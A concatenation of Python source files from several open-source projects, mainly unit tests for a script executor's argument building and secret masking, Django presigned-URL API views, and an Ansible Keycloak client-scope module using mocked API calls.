        config = create_config_model('config_x', parameters=[parameter])
        args_list = executor.build_command_args({'p1': ['val1', 'val2', 'hello world']}, config)
        self.assertEqual(args_list, ['val1; val2; hello world'])

    def test_parameter_multiselect_when_multiple_list_as_multiarg(self):
        parameter = create_script_param_config('p1', type='multiselect', multiple_arguments=True)
        config = create_config_model('config_x', parameters=[parameter])
        args_list = executor.build_command_args({'p1': ['val1', 'val2', 'hello world']}, config)
        self.assertEqual(args_list, ['val1', 'val2', 'hello world'])

    def test_multiple_parameters_sequence(self):
        p1 = create_script_param_config('p1', param='-p1')
        p2 = create_script_param_config('p2')
        p3 = create_script_param_config('p3', param='--p3', no_value=True)
        p4 = create_script_param_config('p4', param='-p4')
        p5 = create_script_param_config('p5')
        config = create_config_model('config_x', parameters=[p1, p2, p3, p4, p5])
        args_string = executor.build_command_args({
            'p1': 'val1',
            'p2': 'val2',
            'p3': 'true',
            'p5': 'val5'},
            config)
        self.assertEqual(args_string, ['-p1', 'val1', 'val2', '--p3', 'val5'])

    def test_parameter_secure_no_value(self):
        parameter = create_script_param_config('p1', param='-p1', secure=True)
        config = create_config_model('config_x', config={'script_path': 'ls'}, parameters=[parameter])
        executor = ScriptExecutor(config, {})
        secure_command = executor.get_secure_command()
        self.assertEqual('ls', secure_command)

    def test_parameter_secure_some_value(self):
        parameter = create_script_param_config('p1', param='-p1', secure=True)
        config = create_config_model('config_x', config={'script_path': 'ls'}, parameters=[parameter])
        executor = ScriptExecutor(config, {'p1': 'value'})
        secure_command = executor.get_secure_command()
        self.assertEqual('ls -p1 ******', secure_command)

    def test_parameter_secure_value_and_same_unsecure(self):
        p1 = create_script_param_config('p1', param='-p1', secure=True)
        p2 = create_script_param_config('p2', param='-p2')
        config = create_config_model('config_x', config={'script_path': 'ls'}, parameters=[p1, p2])
        executor = ScriptExecutor(config, {'p1': 'value', 'p2': 'value'})
        secure_command = executor.get_secure_command()
        self.assertEqual('ls -p1 ****** -p2 value', secure_command)

    def test_parameter_secure_multiselect(self):
        parameter = create_script_param_config('p1', param='-p1', secure=True, type='multiselect')
        config = create_config_model('config_x', config={'script_path': 'ls'}, parameters=[parameter])
        executor = ScriptExecutor(config, {'p1': ['one', 'two', 'three']})
        secure_command = executor.get_secure_command()
        self.assertEqual('ls -p1 ******,******,******', secure_command)

    def test_parameter_secure_multiselect_as_multiarg(self):
        parameter = create_script_param_config(
            'p1', param='-p1', secure=True, type='multiselect', multiple_arguments=True)
        config = create_config_model('config_x', config={'script_path': 'ls'}, parameters=[parameter])
        executor = ScriptExecutor(config, {'p1': ['one', 'two', 'three']})
        secure_command = executor.get_secure_command()
        self.assertEqual('ls -p1 ****** ****** ******', secure_command)
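The tests above pin down how parameter values map to an argv list: positional values, `param` CLI flags, and `no_value` boolean flags. A standalone sketch of that mapping, with hypothetical names rather than script-server's actual `build_command_args` implementation:

```python
def build_args(values, parameters):
    """Map a {name: value} dict onto an argv list.

    Each parameter is a dict with 'name', an optional 'param' (CLI flag),
    and an optional 'no_value' marker for boolean flags.
    """
    args = []
    for param in parameters:
        value = values.get(param['name'])
        if param.get('no_value'):
            if value:  # boolean flag: emit the flag itself, never a value
                args.append(param['param'])
        elif value not in (None, '', []):
            if param.get('param'):
                args.append(param['param'])  # named parameter: flag precedes value
            args.append(value)
    return args
```

Values that are missing or empty are skipped entirely, which matches the "no values" cases exercised above.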
class TestProcessOutput(unittest.TestCase):
    def test_log_raw_single_line(self):
        config = self._create_config()
        self.create_and_start_executor(config)
        observer = _StoringObserver()
        self.executor.get_raw_output_stream().subscribe(observer)
        self.write_process_output('some text')
        wait_buffer_flush()
        self.assertEqual(['some text'], observer.data)

    def test_log_raw_single_buffer(self):
        config = self._create_config()
        self.create_and_start_executor(config)
        observer = _StoringObserver()
        self.executor.get_raw_output_stream().subscribe(observer)
        self.write_process_output('some text')
        self.write_process_output(' and continuation')
        wait_buffer_flush()
        self.assertEqual(['some text and continuation'], observer.data)

    def test_log_raw_multiple_buffers(self):
        config = self._create_config()
        self.create_and_start_executor(config)
        observer = _StoringObserver()
        self.executor.get_raw_output_stream().subscribe(observer)
        self.write_process_output('some text')
        wait_buffer_flush()
        self.write_process_output(' and continuation')
        wait_buffer_flush()
        self.assertEqual(['some text', ' and continuation'], observer.data)

    def test_log_with_secure(self):
        parameter = create_script_param_config('p1', secure=True)
        config = self._create_config(parameters=[parameter])
        self.create_and_start_executor(config, {'p1': 'a'})
        self.write_process_output('a| some text')
        self.write_process_output('\nand a new line')
        self.write_process_output(' with some long long text |a')
        self.finish_process()
        output = self.get_finish_output()
        self.assertEqual(output, '******| some text\nand ****** new line with some long long text |******')

    def test_log_with_secure_ignore_whitespaces(self):
        parameter = create_script_param_config('p1', secure=True)
        config = self._create_config(parameters=[parameter])
        self.create_and_start_executor(config, {'p1': ' '})
        self.write_process_output('some text')
        self.write_process_output('\nand a new line')
        self.write_process_output(' with some long long text')
        self.finish_process()
        output = self.get_finish_output()
        self.assertEqual(output, 'some text\nand a new line with some long long text')

    def test_log_with_secure_when_multiselect(self):
        parameter = create_script_param_config('p1', secure=True, type='multiselect')
        config = self._create_config(parameters=[parameter])
        self.create_and_start_executor(config, {'p1': ['123', 'password']})
        self.write_process_output('some text(123)')
        self.write_process_output('\nand a new line')
        self.write_process_output(' with my password')
        self.finish_process()
        output = self.get_finish_output()
        self.assertEqual(output, 'some text(******)\nand a new line with my ******')

    @staticmethod
    def _create_config(parameters=None):
        return create_config_model('config_x', config={'script_path': 'ls'}, parameters=parameters)

    def setUp(self):
        self.config = create_config_model('config_x')
        self.config.script_command = 'ls'
        executor._process_creator = _MockProcessWrapper
        super().setUp()

    def tearDown(self):
        super().tearDown()
        self.finish_process()
        self.executor.cleanup()

    def write_process_output(self, text):
wrapper = self.executor.process_wrapper
wrapper._write_script_output(text)
# noinspection PyUnresolvedReferences
def finish_process(self):
self.executor.process_wrapper.kill()
def get_finish_output(self):
data = read_until_closed(self.executor.get_anonymized_output_stream(), timeout=BUFFER_FLUSH_WAIT_TIME)
output = ''.join(data)
return output
def create_and_start_executor(self, config, parameter_values=None):
if parameter_values is None:
parameter_values = {}
self.executor = ScriptExecutor(config, parameter_values)
self.executor.start()
return self.executor
def wait_buffer_flush():
time.sleep(BUFFER_FLUSH_WAIT_TIME)

# File: tcpconf.py (repo: dincamihai/nspawn-api, license: MIT)
bind="127.0.0.1:4000"

# File: image/vilt/utils/makearrow.py (repo: yuxuan-lou/ColossalAI-Examples, license: Apache-2.0)
import sys

from write_coco_karpathy import make_arrow

make_arrow(sys.argv[1], sys.argv[2])

# File: lab/documents/tests/test_api_views.py (repo: lajarre/euphrosyne, license: MIT)
from unittest.mock import MagicMock, patch
from django.http.response import JsonResponse
from django.test import RequestFactory
from django.urls import reverse
from ...documents.api_views import (
presigned_document_delete_url_view,
presigned_document_download_url_view,
presigned_document_list_url_view,
presigned_document_upload_url_view,
)
from ...tests.factories import LabAdminUserFactory
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_upload_post",
MagicMock(return_value=""),
)
def test_presigned_document_upload_url_successful_response():
request = RequestFactory().post(
reverse("api:presigned_document_upload_url", args=[1])
)
request.user = LabAdminUserFactory.build()
response = presigned_document_upload_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 200
assert b"url" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_list_url",
MagicMock(return_value=""),
)
def test_presigned_document_list_url_successful_response():
request = RequestFactory().post(
reverse("api:presigned_document_list_url", args=[1])
)
request.user = LabAdminUserFactory.build()
response = presigned_document_list_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 200
assert b"url" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_download_url",
MagicMock(return_value=""),
)
def test_presigned_document_download_url_successful_response():
request = RequestFactory().post(
"{}/?key=projects/{}/documents/".format(
reverse("api:presigned_document_download_url", args=[1]), 1
)
)
request.user = LabAdminUserFactory.build()
response = presigned_document_download_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 200
assert b"url" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_download_url",
MagicMock(return_value=""),
)
def test_presigned_document_download_url_no_key_sends_bad_requests():
request = RequestFactory().post(
reverse("api:presigned_document_download_url", args=[1])
)
request.user = LabAdminUserFactory.build()
response = presigned_document_download_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 400
assert b"message" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_download_url",
MagicMock(return_value=""),
)
def test_presigned_document_download_url_wrong_key_sends_bad_requests():
request = RequestFactory().post(
"{}/?key=projects/{}/documents/".format(
reverse("api:presigned_document_download_url", args=[1]), 2
)
)
request.user = LabAdminUserFactory.build()
response = presigned_document_download_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 400
assert b"message" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_delete_url",
MagicMock(return_value=""),
)
def test_presigned_document_delete_url_successful_response():
request = RequestFactory().post(
"{}/?key=projects/{}/documents/".format(
reverse("api:presigned_document_delete_url", args=[1]), 1
)
)
request.user = LabAdminUserFactory.build()
response = presigned_document_delete_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 200
assert b"url" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_delete_url",
MagicMock(return_value=""),
)
def test_presigned_document_delete_url_no_key_sends_bad_requests():
request = RequestFactory().post(
reverse("api:presigned_document_delete_url", args=[1])
)
request.user = LabAdminUserFactory.build()
response = presigned_document_delete_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 400
assert b"message" in response.content
@patch("lab.models.Project.objects", MagicMock())
@patch(
"lab.documents.api_views.create_presigned_document_delete_url",
MagicMock(return_value=""),
)
def test_presigned_document_delete_url_wrong_key_sends_bad_requests():
request = RequestFactory().post(
"{}/?key=projects/{}/documents/".format(
reverse("api:presigned_document_delete_url", args=[1]), 2
)
)
request.user = LabAdminUserFactory.build()
response = presigned_document_delete_url_view(request, project_id=1)
assert isinstance(response, JsonResponse)
assert response.status_code == 400
assert b"message" in response.content

# File: venv/lib/python3.6/site-packages/ansible_collections/community/general/tests/unit/plugins/modules/identity/keycloak/test_keycloak_clientscope.py (repo: usegalaxy-no/usegalaxy, license: MIT)
# -*- coding: utf-8 -*-
# Copyright: (c) 2021, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from contextlib import contextmanager
from ansible_collections.community.general.tests.unit.compat import unittest
from ansible_collections.community.general.tests.unit.compat.mock import call, patch
from ansible_collections.community.general.tests.unit.plugins.modules.utils import AnsibleExitJson, AnsibleFailJson, \
ModuleTestCase, set_module_args
from ansible_collections.community.general.plugins.modules.identity.keycloak import keycloak_clientscope
from itertools import count
from ansible.module_utils.six import StringIO
@contextmanager
def patch_keycloak_api(get_clientscope_by_name=None, get_clientscope_by_clientscopeid=None, create_clientscope=None,
update_clientscope=None, get_clientscope_protocolmapper_by_name=None,
update_clientscope_protocolmappers=None, create_clientscope_protocolmapper=None,
delete_clientscope=None):
    """Mock context manager for patching the KeycloakAPI methods that contact the Keycloak server.

    Each keyword argument is wired into the mock that replaces the KeycloakAPI
    method of the same name (e.g. ``get_clientscope_by_clientscopeid`` or
    ``delete_clientscope``); arguments left as None produce mocks that simply
    record their calls.

    Example::

        with patch_keycloak_api(get_clientscope_by_name=[None]) as mocks:
            ...
    """
obj = keycloak_clientscope.KeycloakAPI
with patch.object(obj, 'get_clientscope_by_name', side_effect=get_clientscope_by_name) \
as mock_get_clientscope_by_name:
with patch.object(obj, 'get_clientscope_by_clientscopeid', side_effect=get_clientscope_by_clientscopeid) \
as mock_get_clientscope_by_clientscopeid:
with patch.object(obj, 'create_clientscope', side_effect=create_clientscope) \
as mock_create_clientscope:
with patch.object(obj, 'update_clientscope', return_value=update_clientscope) \
as mock_update_clientscope:
with patch.object(obj, 'get_clientscope_protocolmapper_by_name',
side_effect=get_clientscope_protocolmapper_by_name) \
as mock_get_clientscope_protocolmapper_by_name:
with patch.object(obj, 'update_clientscope_protocolmappers',
side_effect=update_clientscope_protocolmappers) \
as mock_update_clientscope_protocolmappers:
with patch.object(obj, 'create_clientscope_protocolmapper',
side_effect=create_clientscope_protocolmapper) \
as mock_create_clientscope_protocolmapper:
with patch.object(obj, 'delete_clientscope', side_effect=delete_clientscope) \
as mock_delete_clientscope:
yield mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope, \
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name, mock_update_clientscope_protocolmappers, \
mock_create_clientscope_protocolmapper, mock_delete_clientscope
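The deeply nested `patch.object` calls above follow a standard pattern: each keyword argument becomes the `side_effect` of the mock that replaces the method of the same name. A minimal standalone sketch of the same pattern (the `API` class and its methods here are hypothetical, not part of this module):

```python
from contextlib import contextmanager
from unittest.mock import patch

class API:
    """Stand-in for a client whose methods would hit a real server."""
    def fetch(self):
        return 'real'
    def store(self, value):
        raise RuntimeError('no server available in tests')

@contextmanager
def patch_api(fetch=None, store=None):
    # Each keyword argument becomes the side_effect of the mock that
    # replaces the method of the same name; None just records calls.
    with patch.object(API, 'fetch', side_effect=fetch) as mock_fetch:
        with patch.object(API, 'store', side_effect=store) as mock_store:
            yield mock_fetch, mock_store

with patch_api(fetch=['a', 'b']) as (mock_fetch, mock_store):
    api = API()
    assert api.fetch() == 'a'   # a list side_effect is consumed call by call
    assert api.fetch() == 'b'
    api.store(1)                # patched: does not raise
    assert mock_store.call_count == 1

assert API().fetch() == 'real'  # patches are undone on exit
```

Passing the per-method behavior as `side_effect` keeps one context manager reusable across every test, at the cost of the pyramid of `with` blocks seen above.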
def get_response(object_with_future_response, method, get_id_call_count):
if callable(object_with_future_response):
return object_with_future_response()
if isinstance(object_with_future_response, dict):
return get_response(
object_with_future_response[method], method, get_id_call_count)
if isinstance(object_with_future_response, list):
call_number = next(get_id_call_count)
return get_response(
object_with_future_response[call_number], method, get_id_call_count)
return object_with_future_response
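`get_response` resolves a nested response spec: callables are invoked, dicts are keyed by HTTP method, and lists are walked with the shared call counter so consecutive requests get consecutive answers. A standalone sketch (restating the helper so the snippet runs on its own):

```python
from itertools import count

def get_response(obj, method, get_id_call_count):
    if callable(obj):
        return obj()  # callable: produce the value lazily
    if isinstance(obj, dict):
        # dict: pick the entry for this HTTP method, then recurse
        return get_response(obj[method], method, get_id_call_count)
    if isinstance(obj, list):
        # list: the shared counter makes successive calls walk the list
        return get_response(obj[next(get_id_call_count)], method, get_id_call_count)
    return obj  # plain value: return as-is

calls = count()
spec = {'GET': ['first', 'second', lambda: 'third']}
assert get_response(spec, 'GET', calls) == 'first'
assert get_response(spec, 'GET', calls) == 'second'
assert get_response(spec, 'GET', calls) == 'third'
```

Because the counter is shared across the whole test, a list spec scripts a sequence of responses for repeated calls to the same URL.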
def build_mocked_request(get_id_user_count, response_dict):
def _mocked_requests(*args, **kwargs):
url = args[0]
method = kwargs['method']
future_response = response_dict.get(url, None)
return get_response(future_response, method, get_id_user_count)
return _mocked_requests
def create_wrapper(text_as_string):
    """Allow mocking repeated calls to the same address.

    Without this factory, the single StringIO would already be exhausted
    (empty) by the time of the second call.
    """
def _create_wrapper():
return StringIO(text_as_string)
return _create_wrapper
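The docstring's point is that a `StringIO` is a one-shot stream: after the first read it is exhausted, so reusing one instance as a mocked response would hand the second call an empty body. The factory pattern sidesteps this by producing a fresh stream per call (restating the helper so the snippet is self-contained):

```python
from io import StringIO

stream = StringIO('{"access_token": "alongtoken"}')
assert stream.read() == '{"access_token": "alongtoken"}'
assert stream.read() == ''  # exhausted: a second read yields nothing

def create_wrapper(text_as_string):
    """Return a zero-argument factory producing a fresh StringIO per call."""
    def _create_wrapper():
        return StringIO(text_as_string)
    return _create_wrapper

wrapper = create_wrapper('payload')
assert wrapper().read() == 'payload'
assert wrapper().read() == 'payload'  # a new stream each time, never empty
```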
def mock_good_connection():
token_response = {
'http://keycloak.url/auth/realms/master/protocol/openid-connect/token': create_wrapper(
'{"access_token": "alongtoken"}'), }
return patch(
'ansible_collections.community.general.plugins.module_utils.identity.keycloak.keycloak.open_url',
side_effect=build_mocked_request(count(), token_response),
autospec=True
)
class TestKeycloakClientscope(ModuleTestCase):
    def setUp(self):
        super(TestKeycloakClientscope, self).setUp()
        self.module = keycloak_clientscope
def test_create_clientscope(self):
        """Create a new client scope"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'present',
'name': 'my-new-kc-clientscope'
}
return_value_get_clientscope_by_name = [
None,
{
"attributes": {},
"id": "73fec1d2-f032-410c-8177-583104d01305",
"name": "my-new-kc-clientscope"
}]
changed = True
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
        # Verify the number of calls on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 2)
self.assertEqual(mock_create_clientscope.call_count, 1)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 0)
self.assertEqual(mock_update_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 0)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 0)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 0)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
def test_create_clientscope_idempotency(self):
        """Creating a client scope that already exists makes no changes"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'present',
'name': 'my-new-kc-clientscope'
}
return_value_get_clientscope_by_name = [{
"attributes": {},
"id": "73fec1d2-f032-410c-8177-583104d01305",
"name": "my-new-kc-clientscope"
}]
changed = False
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
        # Verify the number of calls on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 1)
self.assertEqual(mock_create_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 0)
self.assertEqual(mock_update_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 0)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 0)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 0)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
def test_delete_clientscope(self):
        """Delete an existing client scope"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'absent',
'name': 'my-new-kc-clientscope'
}
return_value_get_clientscope_by_name = [{
"attributes": {},
"id": "73fec1d2-f032-410c-8177-583104d01305",
"name": "my-new-kc-clientscope"
}]
changed = True
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
        # Verify the number of calls on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 1)
self.assertEqual(mock_create_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 0)
self.assertEqual(mock_update_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 0)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 0)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 1)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
def test_delete_clientscope_idempotency(self):
        """Deleting a client scope that does not exist makes no changes"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'absent',
'name': 'my-new-kc-clientscope'
}
return_value_get_clientscope_by_name = [None]
changed = False
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
        # Verify the number of calls on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 1)
self.assertEqual(mock_create_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 0)
self.assertEqual(mock_update_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 0)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 0)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 0)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
def test_create_clientscope_with_protocolmappers(self):
        """Create a new client scope with protocol mappers"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'present',
'name': 'my-new-kc-clientscope',
'protocolMappers': [
{
'protocol': 'openid-connect',
'config': {
'full.path': 'true',
'id.token.claim': 'true',
'access.token.claim': 'true',
'userinfo.token.claim': 'true',
'claim.name': 'protocol1',
},
'name': 'protocol1',
'protocolMapper': 'oidc-group-membership-mapper',
},
{
'protocol': 'openid-connect',
'config': {
'full.path': 'false',
'id.token.claim': 'false',
'access.token.claim': 'false',
'userinfo.token.claim': 'false',
'claim.name': 'protocol2',
},
'name': 'protocol2',
'protocolMapper': 'oidc-group-membership-mapper',
},
{
'protocol': 'openid-connect',
'config': {
'full.path': 'true',
'id.token.claim': 'false',
'access.token.claim': 'true',
'userinfo.token.claim': 'false',
'claim.name': 'protocol3',
},
'name': 'protocol3',
'protocolMapper': 'oidc-group-membership-mapper',
},
]
}
return_value_get_clientscope_by_name = [
None,
{
"attributes": {},
"id": "890ec72e-fe1d-4308-9f27-485ef7eaa182",
"name": "my-new-kc-clientscope",
"protocolMappers": [
{
"config": {
"access.token.claim": "false",
"claim.name": "protocol2",
"full.path": "false",
"id.token.claim": "false",
"userinfo.token.claim": "false"
},
"consentRequired": "false",
"id": "a7f19adb-cc58-41b1-94ce-782dc255139b",
"name": "protocol2",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "true",
"claim.name": "protocol3",
"full.path": "true",
"id.token.claim": "false",
"userinfo.token.claim": "false"
},
"consentRequired": "false",
"id": "2103a559-185a-40f4-84ae-9ab311d5b812",
"name": "protocol3",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "true",
"claim.name": "protocol1",
"full.path": "true",
"id.token.claim": "true",
"userinfo.token.claim": "true"
},
"consentRequired": "false",
"id": "bbf6390f-e95f-4c20-882b-9dad328363b9",
"name": "protocol1",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
}]
}]
changed = True
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
        # Verify the number of calls on each mock
self.assertEqual(mock_get_clientscope_by_name.call_count, 2)
self.assertEqual(mock_create_clientscope.call_count, 1)
self.assertEqual(mock_get_clientscope_by_clientscopeid.call_count, 0)
self.assertEqual(mock_update_clientscope.call_count, 0)
self.assertEqual(mock_get_clientscope_protocolmapper_by_name.call_count, 0)
self.assertEqual(mock_update_clientscope_protocolmappers.call_count, 0)
self.assertEqual(mock_create_clientscope_protocolmapper.call_count, 0)
self.assertEqual(mock_delete_clientscope.call_count, 0)
# Verify that the module's changed status matches what is expected
self.assertIs(exec_info.exception.args[0]['changed'], changed)
def test_update_clientscope_with_protocolmappers(self):
        """Update an existing client scope and its protocol mappers"""
module_args = {
'auth_keycloak_url': 'http://keycloak.url/auth',
'auth_username': 'admin',
'auth_password': 'admin',
'auth_realm': 'master',
'realm': 'realm-name',
'state': 'present',
'name': 'my-new-kc-clientscope',
'protocolMappers': [
{
'protocol': 'openid-connect',
'config': {
'full.path': 'false',
'id.token.claim': 'false',
'access.token.claim': 'false',
'userinfo.token.claim': 'false',
'claim.name': 'protocol1_updated',
},
'name': 'protocol1',
'protocolMapper': 'oidc-group-membership-mapper',
},
{
'protocol': 'openid-connect',
'config': {
'full.path': 'true',
'id.token.claim': 'false',
'access.token.claim': 'false',
'userinfo.token.claim': 'false',
'claim.name': 'protocol2_updated',
},
'name': 'protocol2',
'protocolMapper': 'oidc-group-membership-mapper',
},
{
'protocol': 'openid-connect',
'config': {
'full.path': 'true',
'id.token.claim': 'true',
'access.token.claim': 'true',
'userinfo.token.claim': 'true',
'claim.name': 'protocol3_updated',
},
'name': 'protocol3',
'protocolMapper': 'oidc-group-membership-mapper',
},
]
}
return_value_get_clientscope_by_name = [{
"attributes": {},
"id": "890ec72e-fe1d-4308-9f27-485ef7eaa182",
"name": "my-new-kc-clientscope",
"protocolMappers": [
{
"config": {
"access.token.claim": "true",
"claim.name": "groups",
"full.path": "true",
"id.token.claim": "true",
"userinfo.token.claim": "true"
},
"consentRequired": "false",
"id": "e077007a-367a-444f-91ef-70277a1d868d",
"name": "groups",
"protocol": "saml",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "true",
"claim.name": "groups",
"full.path": "true",
"id.token.claim": "true",
"userinfo.token.claim": "true"
},
"consentRequired": "false",
"id": "06c518aa-c627-43cc-9a82-d8467b508d34",
"name": "groups",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "true",
"claim.name": "groups",
"full.path": "true",
"id.token.claim": "true",
"userinfo.token.claim": "true"
},
"consentRequired": "false",
"id": "1d03c557-d97e-40f4-ac35-6cecd74ea70d",
"name": "groups",
"protocol": "wsfed",
"protocolMapper": "oidc-group-membership-mapper"
}
]
}]
return_value_get_clientscope_by_clientscopeid = [{
"attributes": {},
"id": "2286032f-451e-44d5-8be6-e45aac7983a1",
"name": "my-new-kc-clientscope",
"protocolMappers": [
{
"config": {
"access.token.claim": "true",
"claim.name": "protocol1_updated",
"full.path": "true",
"id.token.claim": "false",
"userinfo.token.claim": "false"
},
"consentRequired": "false",
"id": "a7f19adb-cc58-41b1-94ce-782dc255139b",
"name": "protocol2",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "true",
"claim.name": "protocol1_updated",
"full.path": "true",
"id.token.claim": "false",
"userinfo.token.claim": "false"
},
"consentRequired": "false",
"id": "2103a559-185a-40f4-84ae-9ab311d5b812",
"name": "protocol3",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
},
{
"config": {
"access.token.claim": "false",
"claim.name": "protocol1_updated",
"full.path": "false",
"id.token.claim": "false",
"userinfo.token.claim": "false"
},
"consentRequired": "false",
"id": "bbf6390f-e95f-4c20-882b-9dad328363b9",
"name": "protocol1",
"protocol": "openid-connect",
"protocolMapper": "oidc-group-membership-mapper"
}
]
}]
changed = True
set_module_args(module_args)
# Run the module
with mock_good_connection():
with patch_keycloak_api(get_clientscope_by_name=return_value_get_clientscope_by_name,
get_clientscope_by_clientscopeid=return_value_get_clientscope_by_clientscopeid) \
as (mock_get_clientscope_by_name, mock_get_clientscope_by_clientscopeid, mock_create_clientscope,
mock_update_clientscope, mock_get_clientscope_protocolmapper_by_name,
mock_update_clientscope_protocolmappers,
mock_create_clientscope_protocolmapper, mock_delete_clientscope):
with self.assertRaises(AnsibleExitJson) as exec_info:
self.module.main()
